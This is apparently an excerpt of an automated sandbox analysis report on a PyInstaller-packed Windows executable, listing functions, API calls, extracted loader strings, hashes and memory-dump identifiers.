                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                • Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                                • Instruction ID: f31e43f7cc1ecf0000b0a3952f4641eef8875ed9369c8e0ed40dc8d8bcd1f458
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3516751A2864283FB51BF25F8926BAE261AFD4FA0FC44431DD4E83695EE2CE5078760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction ID: b69ec6ad47f99b26d8d78d5c386557fc31bd60fa7cc845e6c07e3b35e5390eb2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2351F536604BA187D634AF22B4581BAB7A1F798B61F004121EFDF43694DF3CD146CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                • Instruction ID: 86d7806d4dccd00ecdf22ea55be2873d6fcdad52cfb7b10f5740765c9b675272
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98218861B09A42C3E756AF7AF894179E251EFD8FB0F884131DE2E437D4DE2CD6528620
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction ID: 4abb384f242921e5caf117a6d7df74cc094bcb271b34403e32910553b9a08c28
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02128062A0C25387FB207E94F155279F6A1FBD0F60FD44535E68A46AC4DF3CE5828B20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction ID: 5478132b5a48bde4f3d31b9344c6de7f427e734b29c478a26098793db5f17028
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 031261B1A4C14387FB20BE95B054679F261EBC0FB4FD84035D69946AC4DF7CE882AB21
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: 2048979618f4410f80e1bec86b0c2cfc624223f2fb3d1bf9b120f3ac00452a64
                                                                                                                                                                                                                                                • Instruction ID: 67127a4641d1bf354300442f931eb79464fd7d3ecc53737f83b1d70d28718333
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2048979618f4410f80e1bec86b0c2cfc624223f2fb3d1bf9b120f3ac00452a64
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E4169A2A0865283EA10FF62B8416B9A395ABC4FE4FD54431ED1D47796DE3CE1078760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: 3e7eb559cb89a0d92ac7ace3cd91a7b613190ff46f0abfec8d204b44a62552d9
                                                                                                                                                                                                                                                • Instruction ID: b8c9533c1dff879ac79f854dec3860f975f53bc920527f97a2c7f245373c97bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e7eb559cb89a0d92ac7ace3cd91a7b613190ff46f0abfec8d204b44a62552d9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85419E61A0864287EA10EF66B4811B9E3A0BF85FF4FC44436ED5E47B95DE3CE5079B20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                • Instruction ID: a642eb1b9395f5677efa44121c080aac7778333b7e7bdf810118405a9d7ae0a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D1C4B2A0874187EB20EF64E4413ADB7A4FB85BA8F840135EE8D57B95CF38E156C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF7C71B2D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                • Instruction ID: c7874b6e1f3c0e2f740e3ef0c920de6f20d07722c257f8f0df6a6739500b376a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E731B662B08A4143E621AF15B8542AAA695BFC8BE8F814135DF4E93759DE3CD60BC710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDBD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDCB
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDDF5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDE63
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF7C71BDFEA,?,?,?,00007FF7C71BDCDC,?,?,?,00007FF7C71BD8D9), ref: 00007FF7C71BDE6F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                • Instruction ID: ba0473aa731bf7e42cd85fbf2bf0c8852bc16cdb4feb7f1355fe2df894286e21
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4631C361B2A60286EE2AAF42B841575A394FF98FB0FC94135DD5D17380EF3CE4468724
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                • Instruction ID: d131e0bf37c044a7974ff9731e90d6bf2c0c4d3d92f0c100cc1a6b660e626357
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08418171A18A8692EA11EF21F4552E9A321FBD4BA0FC04132DE5D43695EF3CE607C760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7C71B351A,?,00000000,00007FF7C71B3F23), ref: 00007FF7C71B2AA0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                • Instruction ID: 6b5531451ddfac0b76ca5acae421f9e055fb2d1d851ddc85a51b2d2b1c47eff7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D218372A1978183E621AF51B4817E6A394FBC8BE4F800135EE8D43659DF3CD6468750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                                • Instruction ID: 96679687bb0f867858aec36cca566132b03a234d53476b55c5c9711b93eb1809
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C215721F0C28243FA697FA1765613DE1965FC4FB0F808634E93E86AD6DE2CB5438321
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2677000448.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2676969051.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677042572.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677114822.00007FF7C71F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2677356799.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                • Instruction ID: 0226122bda733956a6502481375fa0f909eb21a739ada15b9670158838be3f89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC11D631718A4187E361AF12F884329A2A0FBD8FF4F800234D95E87794DF3CE9458B50
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B8592
                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B85E9
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B8678
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B86E4
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B86F5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B870A
